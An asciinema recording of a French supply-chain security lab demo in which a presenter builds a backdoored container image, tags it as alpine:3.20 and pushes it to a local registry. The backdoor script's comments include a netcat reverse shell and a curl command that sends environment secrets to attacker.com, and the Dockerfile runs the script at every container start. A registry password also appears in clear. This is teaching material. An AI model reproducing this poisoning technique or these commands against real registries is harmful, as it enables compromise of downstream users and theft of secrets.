{"version":3,"term":{"cols":191,"rows":45,"type":"xterm-ghostty","version":"ghostty 1.3.1-2.fc44","theme":{"fg":"#24292f","bg":"#ffffff","palette":"#24292f:#b35900:#0550ae:#4d2d00:#0969da:#8250df:#1b7c83:#6e7781:#57606a:#8a4600:#0969da:#633c01:#218bff:#a475f9:#3192aa:#8c959f"}},"timestamp":1782932904,"title":"Chapter3 - Attack","env":{"SHELL":"/bin/bash"}}
[0.198423, "o", "WARNING! Using --password via the CLI is insecure. Use --password-stdin.\r\n"]
[0.808776, "o", "Login Succeeded\r\n"]
[0.006269, "o", "WARNING: Running setxkbmap against an Xwayland server\r\n"]
[1.128619, "o", "\u001b]0;skhoury@skhoury:~/go/src/github.com/sherine-k/supply-chain-dd/challenges/challenge3\u0007"]
[0.00396, "o", "\u001b]3008;start=3bac6e2a-5169-45a8-bb41-8e0960da1cc6;machineid=13ced54cfadd482cb31a63653129207c;user=skhoury;hostname=skhoury;bootid=2e78e15d-7d07-4046-8f12-62936f125abb;pid=00000000000000444237;type=shell;cwd=/home/skhoury/go/src/github.com/sherine-k/supply-chain-dd/challenges/challenge3\u001b\\"]
[0.014751, "o", "\u001b[?2004h╭─╼skhoury@skhoury \u001b[32m~/.../challenges/challenge3 \r\r\n\u001b[00m╰─ \u001b[91m(sherine)-\u001b[00m$ \r\u001b[00m╰─ \u001b[91m(sherine)-\u001b[00m$ "]
[0.56836, "i", "."]
[0.000092, "o", ".\r\u001b[00m╰─ \u001b[91m(sherine)-\u001b[00m$ \u001b[C"]
[0.055464, "i", "/"]
[0.000074, "o", "/"]
[0.328133, "i", "a"]
[0.000082, "o", "a"]
[0.176964, "i", "t"]
[0.000091, "o", "t"]
[0.205454, "i", "a"]
[0.000094, "o", "a"]
[0.549453, "i", ""]
[0.000094, "o", "\b\u001b[K"]
[0.076296, "i", "t"]
[0.000074, "o", "t"]
[0.084394, "i", "a"]
[0.000075, "o", "a"]
[0.265084, "i", "\t"]
[0.000254, "o", "ck-demo.sh "]
[0.67078, "i", "\r"]
[0.000062, "o", "\r\n\u001b[?2004l\r"]
[0.004187, "o", "\u001b]3008;start=508b8f66-0102-45fa-b8a5-98555122fff8;machineid=13ced54cfadd482cb31a63653129207c;user=skhoury;hostname=skhoury;bootid=2e78e15d-7d07-4046-8f12-62936f125abb;pid=00000000000000444237;type=command;cwd=/home/skhoury/go/src/github.com/sherine-k/supply-chain-dd/challenges/challenge3\u001b\\"]
[0.002858, "o", "\u001b[H\u001b[2J\u001b[3J"]
[0.009459, "o", "$ "]
[0.894889, "i", "\r"]
[0.001456, "o", "\u001b["]
[0.180263, "o", "1m"]
[0.090119, "o", "=="]
[0.090118, "o", "= "]
[0.090153, "o", "DE"]
[0.090113, "o", "MO"]
[0.090113, "o", " A"]
[0.090128, "o", "TT"]
[0.090146, "o", "AQ"]
[0.090126, "o", "UE"]
[0.180241, "o", " : "]
[0.090093, "o", "Ch"]
[0.090112, "o", "al"]
[0.090122, "o", "le"]
[0.090107, "o", "ng"]
[0.090142, "o", "e "]
[0.090156, "o", "3 "]
[0.180179, "o", "— "]
[0.180211, "o", "Em"]
[0.090121, "o", "poi"]
[0.090119, "o", "so"]
[0.090119, "o", "nn"]
[0.090125, "o", "em"]
[0.090136, "o", "en"]
[0.090042, "o", "t "]
[0.090113, "o", "d'"]
[0.090114, "o", "im"]
[0.180231, "o", "ag"]
[0.09013, "o", "e "]
[0.090111, "o", "de "]
[0.090118, "o", "ba"]
[0.090146, "o", "se"]
[0.090061, "o", " ="]
[0.09012, "o", "=="]
[0.090158, "o", "\u001b["]
[0.090085, "o", "0m"]
[0.392175, "i", "\r"]
[0.000116, "o", "\r\n"]
[0.004227, "o", "$ "]
[0.69803, "i", "\r"]
[0.001433, "o", "\u001b["]
[0.180237, "o", "1m"]
[0.090116, "o", "cr"]
[0.09015, "o", "an"]
[0.09025, "o", "e "]
[0.090042, "o", "ma"]
[0.090123, "o", "ni"]
[0.09016, "o", "fe"]
[0.090175, "o", "st"]
[0.090084, "o", " r"]
[0.180225, "o", "egi"]
[0.09005, "o", "st"]
[0.090151, "o", "ry"]
[0.090076, "o", ".s"]
[0.090126, "o", "c."]
[0.090122, "o", "lo"]
[0.090106, "o", "ca"]
[0.090125, "o", "l:"]
[0.090113, "o", "30"]
[0.180186, "o", "44"]
[0.090113, "o", "3/a"]
[0.090142, "o", "lp"]
[0.090092, "o", "in"]
[0.090138, "o", "e:"]
[0.090164, "o", "3."]
[0.09008, "o", "20"]
[0.09014, "o", " |"]
[0.09007, "o", " j"]
[0.180172, "o", "q "]
[0.090134, "o", "'."]
[0.090145, "o", "lay"]
[0.090122, "o", "er"]
[0.090133, "o", "s["]
[0.090108, "o", "] "]
[0.090114, "o", "| "]
[0.090157, "o", ".d"]
[0.090135, "o", "ig"]
[0.180156, "o", "es"]
[0.090149, "o", "t'"]
[0.090086, "o", "\u001b["]
[0.090142, "o", "0m"]
[0.432491, "i", "\r"]
[0.000085, "o", "\r\n"]
[0.043237, "o", "\u001b[0;32m\"sha256:2f6ce2d4fbf565caae08419e9dbc1d5e7569626c6ac99a697989b7665a429ece\"\u001b[0m\r\n"]
[0.004963, "o", "$ "]
[0.766052, "i", "\r"]
[0.001523, "o", "\u001b"]
[0.180231, "o", "[1"]
[0.09014, "o", "m1"]
[0.090106, "o", ". "]
[0.090116, "o", "C"]
[0.090115, "o", "r"]
[0.090143, "o", "éa"]
[0.090122, "o", "ti"]
[0.090118, "o", "on"]
[0.090137, "o", " "]
[0.180289, "o", "du"]
[0.090126, "o", " s"]
[0.090115, "o", "cr"]
[0.090086, "o", "ip"]
[0.090169, "o", "t"]
[0.090102, "o", " b"]
[0.090123, "o", "ac"]
[0.090135, "o", "kd"]
[0.090119, "o", "oo"]
[0.180239, "o", "r"]
[0.090113, "o", "\u001b["]
[0.090119, "o", "0m"]
[0.294888, "i", "\r"]
[0.000097, "o", "\r\n"]
[0.006475, "o", "$ "]
[1.086403, "i", "\r"]
[0.00155, "o", "\u001b["]
[0.180241, "o", "1m"]
[0.090118, "o", "ba"]
[0.090118, "o", "t "]
[0.090105, "o", "/tm"]
[0.090109, "o", "p/"]
[0.090121, "o", "tm"]
[0.09012, "o", "p."]
[0.090125, "o", "Zm"]
[0.09015, "o", "cQP"]
[0.180226, "o", "Ob"]
[0.090137, "o", "iX"]
[0.090074, "o", "l/"]
[0.090149, "o", "ba"]
[0.090081, "o", "ckd"]
[0.090119, "o", "oo"]
[0.090146, "o", "r."]
[0.0901, "o", "sh"]
[0.090127, "o", "\u001b["]
[0.180237, "o", "0m"]
[0.306267, "i", "\r"]
[0.000094, "o", "\r\n"]
[0.003018, "o", "\u001b]10;?\u0007\u001b]11;?\u0007\u001b[c"]
[0.000099, "i", "\u001b]10;rgb:2424/2929/2f2f\u0007\u001b]11;rgb:ffff/ffff/ffff\u0007\u001b[?62;22;52c"]
[0.011979, "o", "\r\u001b[38;2;131;148;150m─────┬─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[0m\u001b[m\r\n     \u001b[38;2;131;148;150m│ \u001b[0mFile: \u001b[1m/tmp/tmp.ZmcQPObiXl/backdoor.sh\u001b[0m\u001b[m\r\n\u001b[38;2;131;148;150m─────┼─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[0m\u001b[m\r\n\u001b[38;2;131;148;150m   1\u001b[0m \u001b[38;2;131;148;150m│\u001b[0m \u001b[38;2;124;120;101m#\u001b[0m\u001b[38;2;124;120;101m!/bin/sh\u001b[0m\u001b[m\r\n\u001b[38;2;131;148;150m   2\u001b[0m \u001b[38;2;131;148;150m│\u001b[0m \u001b[38;2;124;120;101m#\u001b[0m\u001b[38;2;124;120;101m Malicious payload - Reverse shell backdoor\u001b[0m\u001b[m\r\n\u001b[38;2;131;148;150m   3\u001b[0m \u001b[38;2;131;148;150m│\u001b[0m \u001b[38;2;124;120;101m#\u001b[0m\u001b[38;2;124;120;101m In a real attack, this could exfiltrate secrets, create persistence, etc.\u001b[0m\u001b[m\r\n\u001b[38;2;131;148;150m   4\u001b[0m \u001b[38;2;131;148;150m│\u001b[0m \u001b[m\r\n\u001b[38;2;131;148;150m   5\u001b[0m \u001b[38;2;131;148;150m│\u001b[0m \u001b[38;2;124;120;101m#\u001b[0m\u001b[38;2;124;120;101m Simulate data exfiltration \u001b[0m\u001b[m\r\n\u001b[38;2;131;148;150m   6\u001b[0m \u001b[38;2;131;148;150m│\u001b[0m \u001b[38;2;0;137;179mecho\u001b[0m\u001b[38;2;73;72;62m \u001b[0m\u001b[38;2;73;72;62m\"\u001b[0m\u001b[38;2"]
[0.000079, "o", ";153;143;47m[MALWARE] Backdoor activated in production container!\u001b[0m\u001b[38;2;73;72;62m\"\u001b[0m\u001b[m\r\n\u001b[38;2;131;148;150m   7\u001b[0m \u001b[38;2;131;148;150m│\u001b[0m \u001b[38;2;0;137;179mecho\u001b[0m\u001b[38;2;73;72;62m \u001b[0m\u001b[38;2;73;72;62m\"\u001b[0m\u001b[38;2;153;143;47m[MALWARE] Flag: \u001b[0m\u001b[38;2;73;72;62m$\u001b[0m\u001b[38;2;73;72;62mFLAG\u001b[0m\u001b[38;2;73;72;62m\"\u001b[0m\u001b[m\r\n\u001b[38;2;131;148;150m   8\u001b[0m \u001b[38;2;131;148;150m│\u001b[0m \u001b[38;2;0;137;179mecho\u001b[0m\u001b[38;2;73;72;62m \u001b[0m\u001b[38;2;73;72;62m\"\u001b[0m\u001b[38;2;153;143;47m[MALWARE] Hostname: \u001b[0m\u001b[38;2;73;72;62m$\u001b[0m\u001b[38;2;153;143;47m(\u001b[0m\u001b[38;2;73;72;62mhostname\u001b[0m\u001b[38;2;153;143;47m)\u001b[0m\u001b[38;2;73;72;62m\"\u001b[0m\u001b[m\r\n\u001b[38;2;131;148;150m   9\u001b[0m \u001b[38;2;131;148;150m│\u001b[0m \u001b[m\r\n\u001b[38;2;131;148;150m  10\u001b[0m \u001b[38;2;131;148;150m│\u001b[0m \u001b[38;2;124;120;101m#\u001b[0m\u001b[38;2;124;120;101m In a real attack, this would:\u001b[0m\u001b[m\r\n\u001b[38;2;131;148;150m  11\u001b[0m \u001b[38;2;131;148;150m│\u001b[0m \u001b[38;2;124;120;101m#\u001b[0m\u001b[38;2;124;120;101m - Establish reverse shell: nc attacker.com 4444 -e /bin/sh\u001b[0m\u001b[m\r\n\u001b[38;2;131;148;150m  12\u001b[0m \u001b[38;2;131;148;150m│\u001b[0m "]
[0.000074, "o", "\u001b[38;2;124;120;101m#\u001b[0m\u001b[38;2;124;120;101m - Exfiltrate secrets: curl -X POST -d \"$(env)\" attacker.com/exfil\u001b[0m\u001b[m\r\n\u001b[38;2;131;148;150m  13\u001b[0m \u001b[38;2;131;148;150m│\u001b[0m \u001b[38;2;124;120;101m#\u001b[0m\u001b[38;2;124;120;101m - Install cryptocurrency miner\u001b[0m\u001b[m\r\n\u001b[38;2;131;148;150m─────┴─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[0m\u001b[m\r\n"]
[0.000043, "o", "\r\u001b[K"]
[0.009758, "o", "$ "]
[0.958893, "i", "\r"]
[0.001839, "o", "\u001b["]
[0.180238, "o", "1m"]
[0.090123, "o", "2."]
[0.090112, "o", " C"]
[0.090124, "o", "ré"]
[0.090201, "o", "at"]
[0.090073, "o", "io"]
[0.090085, "o", "n "]
[0.090118, "o", "du"]
[0.090157, "o", " Do"]
[0.180261, "o", "ck"]
[0.090106, "o", "er"]
[0.090127, "o", "fi"]
[0.090131, "o", "le"]
[0.090144, "o", " ma"]
[0.090112, "o", "lv"]
[0.090149, "o", "ei"]
[0.090019, "o", "ll"]
[0.090118, "o", "an"]
[0.180228, "o", "t\u001b["]
[0.090202, "o", "0m"]
[0.370311, "i", "\r"]
[0.000104, "o", "\r\n"]
[0.004938, "o", "$ "]
[0.709988, "i", "\r"]
[0.001782, "o", "\u001b"]
[0.180188, "o", "[1"]
[0.090076, "o", "mb"]
[0.090119, "o", "at"]
[0.090115, "o", " /"]
[0.092805, "o", "tm"]
[0.089709, "o", "p/"]
[0.090112, "o", "tm"]
[0.090132, "o", "p."]
[0.090155, "o", "Zm"]
[0.180251, "o", "c"]
[0.090083, "o", "QP"]
[0.090131, "o", "Ob"]
[0.090118, "o", "iX"]
[0.090147, "o", "l/"]
[0.090138, "o", "Do"]
[0.090203, "o", "ck"]
[0.090113, "o", "er"]
[0.090124, "o", "fi"]
[0.180304, "o", "le"]
[0.090102, "o", "\u001b"]
[0.090113, "o", "[0"]
[0.090132, "o", "m"]
[0.325802, "i", "\r"]
[0.000124, "o", "\r\n"]
[0.002855, "o", "\u001b]10;?\u0007\u001b]11;?\u0007\u001b[c"]
[0.000131, "i", "\u001b]10;rgb:2424/2929/2f2f\u0007\u001b]11;rgb:ffff/ffff/ffff\u0007\u001b[?62;22;52c"]
[0.0097, "o", "\r\u001b[38;2;131;148;150m─────┬─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[0m\u001b[m\r\n     \u001b[38;2;131;148;150m│ \u001b[0mFile: \u001b[1m/tmp/tmp.ZmcQPObiXl/Dockerfile\u001b[0m\u001b[m\r\n\u001b[38;2;131;148;150m─────┼─────────────────────────────────────────────────────────────────────────────────────────────────────"]
[0.000063, "o", "────────────────────────────────────────────────────────────────────────────────────\u001b[0m\u001b[m\r\n\u001b[38;2;131;148;150m   1\u001b[0m \u001b[38;2;131;148;150m│\u001b[0m \u001b[38;2;117;113;94m#\u001b[0m\u001b[38;2;117;113;94m Start from legitimate Alpine image\u001b[0m\u001b[m\r\n\u001b[38;2;131;148;150m   2\u001b[0m \u001b[38;2;131;148;150m│\u001b[0m \u001b[38;2;249;0;90mFROM\u001b[0m\u001b[38;2;73;72;62m alpine:\u001b[0m\u001b[38;2;103;156;0m3.20\u001b[0m\u001b[m\r\n\u001b[38;2;131;148;150m   3\u001b[0m \u001b[38;2;131;148;150m│\u001b[0m \u001b[m\r\n\u001b[38;2;131;148;150m   4\u001b[0m \u001b[38;2;131;148;150m│\u001b[0m \u001b[38;2;117;113;94m#\u001b[0m\u001b[38;2;117;113;94m Install our backdoor payload\u001b[0m\u001b[m\r\n\u001b[38;2;131;148;150m   5\u001b[0m \u001b[38;2;131;148;150m│\u001b[0m \u001b[38;2;249;0;90mCOPY\u001b[0m\u001b[38;2;73;72;62m backdoor.sh /usr/local/bin/backdoor.sh\u001b[0m\u001b[m\r\n\u001b[38;2;131;148;150m   6\u001b[0m \u001b[38;2;131;148;150m│\u001b[0m \u001b[38;2;249;0;90mRUN \u001b[0m\u001b[38;2;73;72;62mchmod +x /usr/local/bin/backdoor.sh\u001b[0m\u001b[m\r\n\u001b[38;2;131;148;150"]
[0.000105, "o", "m   7\u001b[0m \u001b[38;2;131;148;150m│\u001b[0m \u001b[m\r\n\u001b[38;2;131;148;150m   8\u001b[0m \u001b[38;2;131;148;150m│\u001b[0m \u001b[38;2;117;113;94m#\u001b[0m\u001b[38;2;117;113;94m Execute backdoor on container startup (stealthy - runs in background)\u001b[0m\u001b[m\r\n\u001b[38;2;131;148;150m   9\u001b[0m \u001b[38;2;131;148;150m│\u001b[0m \u001b[38;2;117;113;94m#\u001b[0m\u001b[38;2;117;113;94m This modifies the shell profile so any container using this image\u001b[0m\u001b[m\r\n\u001b[38;2;131;148;150m  10\u001b[0m \u001b[38;2;131;148;150m│\u001b[0m \u001b[38;2;117;113;94m#\u001b[0m\u001b[38;2;117;113;94m will execute our malware when starting\u001b[0m\u001b[m\r\n\u001b[38;2;131;148;150m  11\u001b[0m \u001b[38;2;131;148;150m│\u001b[0m \u001b[38;2;249;0;90mRUN \u001b[0m\u001b[38;2;73;72;62mecho \u001b[0m\u001b[38;2;153;143;47m'\u001b[0m\u001b[38;2;153;143;47m#!/bin/sh\u001b[0m\u001b[38;2;153;143;47m'\u001b[0m\u001b[38;2;73;72;62m > /etc/profile.d/init.sh && \\\u001b[0m\u001b[m\r\n\u001b[38;2;131;148;150m  12\u001b[0m \u001b[38;2;131;148;150m│\u001b[0m \u001b[38;2;73;72;62m    echo \u001b[0m\u001b[38;2;153;143;47m'\u001b[0m\u001b[38;2;153;143;47m/usr/local/bin/backdoor.sh &\u001b[0m\u001b[38;2;153;143;47m'\u001b[0m\u001b[38;2;73;72;62m >> /etc/profile.d/init.sh && \\\u001b[0m\u001b[m\r\n\u001b[38;2;131;148;150m  13\u001b["]
[0.000094, "o", "0m \u001b[38;2;131;148;150m│\u001b[0m \u001b[38;2;73;72;62m    chmod +x /etc/profile.d/init.sh\u001b[0m\u001b[m\r\n\u001b[38;2;131;148;150m  14\u001b[0m \u001b[38;2;131;148;150m│\u001b[0m \u001b[m\r\n\u001b[38;2;131;148;150m  15\u001b[0m \u001b[38;2;131;148;150m│\u001b[0m \u001b[38;2;117;113;94m#\u001b[0m\u001b[38;2;117;113;94m Make the backdoor part of the default entrypoint behavior\u001b[0m\u001b[m\r\n\u001b[38;2;131;148;150m  16\u001b[0m \u001b[38;2;131;148;150m│\u001b[0m \u001b[38;2;117;113;94m#\u001b[0m\u001b[38;2;117;113;94m When the container starts, our malware runs first\u001b[0m\u001b[m\r\n\u001b[38;2;131;148;150m  17\u001b[0m \u001b[38;2;131;148;150m│\u001b[0m \u001b[38;2;249;0;90mENTRYPOINT \u001b[0m\u001b[38;2;73;72;62m[\u001b[0m\u001b[38;2;153;143;47m\"\u001b[0m\u001b[38;2;153;143;47m/bin/sh\u001b[0m\u001b[38;2;153;143;47m\"\u001b[0m\u001b[38;2;73;72;62m, \u001b[0m\u001b[38;2;153;143;47m\"\u001b[0m\u001b[38;2;153;143;47m-c\u001b[0m\u001b[38;2;153;143;47m\"\u001b[0m\u001b[38;2;73;72;62m, \u001b[0m\u001b[38;2;153;143;47m\"\u001b[0m\u001b[38;2;153;143;47m/etc/profile.d/init.sh && exec \u001b[0m\u001b[38;2;104;77;153m\\\"\u001b[0m\u001b[38;2;153;143;47m$@\u001b[0m\u001b[38;2;104;77;153m\\\"\u001b[0m\u001b[38;2;153;143;47m\"\u001b[0m\u001b[38;2;73;72;62m, \u001b[0m\u001b[38;2;153;143;47m\"\u001b[0m\u001b[38;2;153;143;47m--\u001b[0m\u001b[38;2;153;143;47m\"\u001b[0m"]
[0.000058, "o", "\u001b[38;2;73;72;62m]\u001b[0m\u001b[m\r\n\u001b[38;2;131;148;150m─────┴─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[0m\u001b[m\r\n"]
[0.00005, "o", "\r\u001b[K"]
[0.007582, "o", "$ "]
[1.520509, "i", "\r"]
[0.001466, "o", "\u001b["]
[0.180235, "o", "1m"]
[0.090125, "o", "3."]
[0.090113, "o", " B"]
[0.090222, "o", "ui"]
[0.089976, "o", "ld"]
[0.090163, "o", " d"]
[0.090182, "o", "e "]
[0.09012, "o", "l'"]
[0.090121, "o", "im"]
[0.180289, "o", "ag"]
[0.090058, "o", "e "]
[0.090145, "o", "em"]
[0.090112, "o", "po"]
[0.090131, "o", "is"]
[0.090209, "o", "on"]
[0.090134, "o", "n"]
[0.090091, "o", "ée"]
[0.090131, "o", "\u001b["]
[0.180244, "o", "0m"]
[0.262522, "i", "\r"]
[0.000135, "o", "\r\n"]
[0.003568, "o", "$ "]
[0.918068, "i", "\r"]
[0.001462, "o", "\u001b"]
[0.180299, "o", "[1"]
[0.090062, "o", "mp"]
[0.090117, "o", "od"]
[0.090088, "o", "m"]
[0.090115, "o", "an"]
[0.090152, "o", " b"]
[0.090115, "o", "ui"]
[0.090116, "o", "ld"]
[0.090138, "o", " "]
[0.180212, "o", "-t"]
[0.090118, "o", " r"]
[0.090162, "o", "eg"]
[0.090082, "o", "is"]
[0.090121, "o", "t"]
[0.090121, "o", "ry"]
[0.090156, "o", ".s"]
[0.090136, "o", "c."]
[0.090122, "o", "lo"]
[0.180182, "o", "c"]
[0.090123, "o", "al"]
[0.090123, "o", ":3"]
[0.090162, "o", "04"]
[0.090112, "o", "43"]
[0.090124, "o", "/"]
[0.090123, "o", "al"]
[0.090079, "o", "pi"]
[0.090131, "o", "ne"]
[0.180244, "o", ":3"]
[0.090081, "o", "."]
[0.090194, "o", "20"]
[0.090132, "o", " /"]
[0.090112, "o", "tm"]
[0.090145, "o", "p/"]
[0.090088, "o", "t"]
[0.090105, "o", "mp"]
[0.0902, "o", ".Z"]
[0.180198, "o", "mc"]
[0.090182, "o", "QP"]
[0.090101, "o", "O"]
[0.090041, "o", "bi"]
[0.090132, "o", "Xl"]
[0.090186, "o", "\u001b["]
[0.090122, "o", "0m"]
[0.508982, "i", "\r"]
[0.000106, "o", "\r\n"]
[0.038484, "o", "STEP 1/5: FROM alpine:3.20\r\n"]
[0.019551, "o", "STEP 2/5: COPY backdoor.sh /usr/local/bin/backdoor.sh\r\n"]
[0.275521, "o", "--> cc0128dad8e7\r\n"]
[0.005465, "o", "STEP 3/5: RUN chmod +x /usr/local/bin/backdoor.sh\r\n"]
[0.427397, "o", "--> a45a85808b3e\r\n"]
[0.005303, "o", "STEP 4/5: RUN echo '#!/bin/sh' > /etc/profile.d/init.sh &&     echo '/usr/local/bin/backdoor.sh &' >> /etc/profile.d/init.sh &&     chmod +x /etc/profile.d/init.sh\r\n"]
[0.400348, "o", "--> 447480bb581c\r\n"]
[0.005081, "o", "STEP 5/5: ENTRYPOINT [\"/bin/sh\", \"-c\", \"/etc/profile.d/init.sh && exec \\\"$@\\\"\", \"--\"]\r\n"]
[0.031533, "o", "COMMIT registry.sc.local:30443/alpine:3.20\r\n"]
[0.043992, "o", "--> 1b306b8a0cfc\r\n"]
[0.000102, "o", "Successfully tagged registry.sc.local:30443/alpine:3.20\r\n"]
[0.010934, "o", "1b306b8a0cfc8e036001af4d7f2531e6b145880071220d263c567bd0f13c394e\r\n"]
[0.011912, "o", "$ "]
[0.946718, "i", "\r"]
[0.001547, "o", "\u001b"]
[0.180238, "o", "[1"]
[0.090143, "o", "m4"]
[0.090159, "o", ". "]
[0.090054, "o", "Pu"]
[0.090133, "o", "sh"]
[0.090115, "o", " d"]
[0.090085, "o", "e "]
[0.090135, "o", "l'"]
[0.090114, "o", "im"]
[0.180284, "o", "a"]
[0.090181, "o", "ge"]
[0.090126, "o", " e"]
[0.09011, "o", "mp"]
[0.090111, "o", "oi"]
[0.09012, "o", "so"]
[0.090121, "o", "nn"]
[0.090124, "o", "é"]
[0.090123, "o", "e "]
[0.18022, "o", "ve"]
[0.090125, "o", "r"]
[0.09012, "o", "s "]
[0.090118, "o", "le"]
[0.090113, "o", " r"]
[0.090121, "o", "eg"]
[0.090145, "o", "is"]
[0.090133, "o", "tr"]
[0.090015, "o", "e\u001b"]
[0.180257, "o", "[0"]
[0.090096, "o", "m"]
[0.263963, "i", "\r"]
[0.000102, "o", "\r\n"]
[0.003777, "o", "$ "]
[0.001317, "o", "\u001b"]
[0.18023, "o", "[1"]
[0.090132, "o", "mp"]
[0.093112, "o", "od"]
[0.09002, "o", "ma"]
[0.090106, "o", "n "]
[0.090127, "o", "lo"]
[0.090158, "o", "gi"]
[0.090049, "o", "n "]
[0.090141, "o", "re"]
[0.180225, "o", "g"]
[0.090127, "o", "is"]
[0.090091, "o", "tr"]
[0.09012, "o", "y."]
[0.09012, "o", "sc"]
[0.090114, "o", ".l"]
[0.09012, "o", "oc"]
[0.090108, "o", "al"]
[0.090121, "o", ":3"]
[0.180251, "o", "04"]
[0.090136, "o", "4"]
[0.09011, "o", "3 "]
[0.090189, "o", "-u"]
[0.090101, "o", " s"]
[0.090148, "o", "c-"]
[0.09016, "o", "ad"]
[0.090129, "o", "mi"]
[0.090069, "o", "n "]
[0.180245, "o", "-p"]
[0.090083, "o", " R"]
[0.090185, "o", "e"]
[0.090088, "o", "gi"]
[0.090159, "o", "st"]
[0.090121, "o", "ry"]
[0.090121, "o", "Pa"]
[0.09009, "o", "ss"]
[0.090116, "o", "12"]
[0.180257, "o", "3!"]
[0.090141, "o", " 2"]
[0.09012, "o", ">/"]
[0.09008, "o", "d"]
[0.090214, "o", "ev"]
[0.089962, "o", "/n"]
[0.090117, "o", "ul"]
[0.090121, "o", "l\u001b"]
[0.090119, "o", "[0"]
[0.180222, "o", "m"]
[0.000284, "o", "\r\n"]
[0.078004, "o", "Login Succeeded!\r\n"]
[0.009955, "o", "$ "]
[1.889645, "i", "\r"]
[0.001391, "o", "\u001b["]
[0.180302, "o", "1m"]
[0.090153, "o", "po"]
[0.090037, "o", "dm"]
[0.090148, "o", "an "]
[0.090084, "o", "pu"]
[0.090226, "o", "sh"]
[0.090175, "o", " r"]
[0.09, "o", "eg"]
[0.090122, "o", "ist"]
[0.180247, "o", "ry"]
[0.090117, "o", ".s"]
[0.090151, "o", "c."]
[0.090103, "o", "lo"]
[0.090147, "o", "cal"]
[0.090098, "o", ":3"]
[0.090036, "o", "04"]
[0.090161, "o", "43"]
[0.090059, "o", "/a"]
[0.180163, "o", "lpi"]
[0.090103, "o", "ne"]
[0.090122, "o", ":3"]
[0.090148, "o", ".2"]
[0.090121, "o", "0\u001b"]
[0.090162, "o", "[0m"]
[1.101067, "i", "\r"]
[0.000162, "o", "\r\n"]
[0.06917, "o", "Getting image source signatures\r\n"]
[0.150959, "o", "Copying blob 5011b575ca4f done   | \r\nCopying blob 3bece6044d7a done   | \r\nCopying blob 3bece6044d7a done   | \r\nCopying blob c265cb3fa7c8 skipped: already exists  \r\n"]
[0.150492, "o", "\u001b[4A\u001b[JCopying blob 5011b575ca4f done   | \r\nCopying blob 3bece6044d7a done   | \r\nCopying blob 3bece6044d7a done   | \r\nCopying blob c265cb3fa7c8 skipped: already exists  \r\n"]
[0.000103, "o", "\u001b[4A\u001b[JCopying blob 5011b575ca4f done   | \r\nCopying blob 3bece6044d7a done   | \r\nCopying blob 3bece6044d7a done   | \r\nCopying blob c265cb3fa7c8 skipped: already exists  \r\n"]
[0.006548, "o", "Copying config 1b306b8a0c done   | \r\n"]
[0.000016, "o", "\u001b[1A\u001b[JCopying config 1b306b8a0c done   | \r\n"]
[0.017176, "o", "\u001b[1A\u001b[JCopying config 1b306b8a0c done   | \r\nWriting manifest to image destination\r\n"]
[0.023639, "o", "$ "]
[0.91491, "i", "\r"]
[0.001621, "o", "\u001b"]
[0.180222, "o", "[1"]
[0.090095, "o", "m"]
[0.090115, "o", "→"]
[0.090123, "o", " "]
[0.090117, "o", "L'"]
[0.090113, "o", "im"]
[0.090115, "o", "ag"]
[0.090203, "o", "e "]
[0.090101, "o", "a"]
[0.180268, "o", " "]
[0.090161, "o", "ét"]
[0.090123, "o", "é"]
[0.090118, "o", " p"]
[0.090129, "o", "u"]
[0.090082, "o", "sh"]
[0.090153, "o", "é"]
[0.090091, "o", "e."]
[0.090118, "o", " R"]
[0.18026, "o", "e"]
[0.09013, "o", "ga"]
[0.090136, "o", "rd"]
[0.090137, "o", "on"]
[0.090074, "o", "s "]
[0.090149, "o", "s"]
[0.090096, "o", "on"]
[0.09011, "o", " m"]
[0.090116, "o", "an"]
[0.18022, "o", "if"]
[0.090125, "o", "e"]
[0.090202, "o", "st"]
[0.090113, "o", " "]
[0.090811, "o", "—"]
[0.090137, "o", " o"]
[0.090222, "o", "n"]
[0.090032, "o", " v"]
[0.090126, "o", "oi"]
[0.180219, "o", "t "]
[0.090114, "o", "pl"]
[0.090108, "o", "u"]
[0.090117, "o", "si"]
[0.090128, "o", "eu"]
[0.090114, "o", "rs"]
[0.090164, "o", " c"]
[0.090114, "o", "o"]
[0.090086, "o", "uc"]
[0.18027, "o", "he"]
[0.090115, "o", "s "]
[0.090115, "o", ":\u001b"]
[0.090165, "o", "["]
[0.090131, "o", "0m"]
[1.235456, "i", "\r"]
[0.00018, "o", "\r\n"]
[0.00359, "o", "$ "]
[0.985365, "i", "\r"]
[0.001649, "o", "\u001b["]
[0.180246, "o", "1m"]
[0.090116, "o", "cr"]
[0.090128, "o", "an"]
[0.090779, "o", "e "]
[0.089474, "o", "ma"]
[0.090127, "o", "ni"]
[0.090108, "o", "fe"]
[0.090142, "o", "st"]
[0.09004, "o", " r"]
[0.180216, "o", "egi"]
[0.090909, "o", "st"]
[0.09012, "o", "ry"]
[0.090113, "o", ".s"]
[0.090133, "o", "c."]
[0.090138, "o", "lo"]
[0.090107, "o", "ca"]
[0.090145, "o", "l:"]
[0.090129, "o", "30"]
[0.180204, "o", "44"]
[0.090136, "o", "3/a"]
[0.090143, "o", "lp"]
[0.090115, "o", "in"]
[0.090158, "o", "e:"]
[0.090076, "o", "3."]
[0.090127, "o", "20"]
[0.090136, "o", " |"]
[0.090108, "o", " j"]
[0.180241, "o", "q "]
[0.090108, "o", "'."]
[0.090072, "o", "lay"]
[0.090115, "o", "er"]
[0.090044, "o", "s["]
[0.090143, "o", "] "]
[0.090209, "o", "| "]
[0.090073, "o", ".d"]
[0.090119, "o", "ig"]
[0.180201, "o", "es"]
[0.090112, "o", "t'"]
[0.090123, "o", "\u001b["]
[0.090117, "o", "0m"]
[1.754824, "i", "\r"]
[0.000135, "o", "\r\n"]
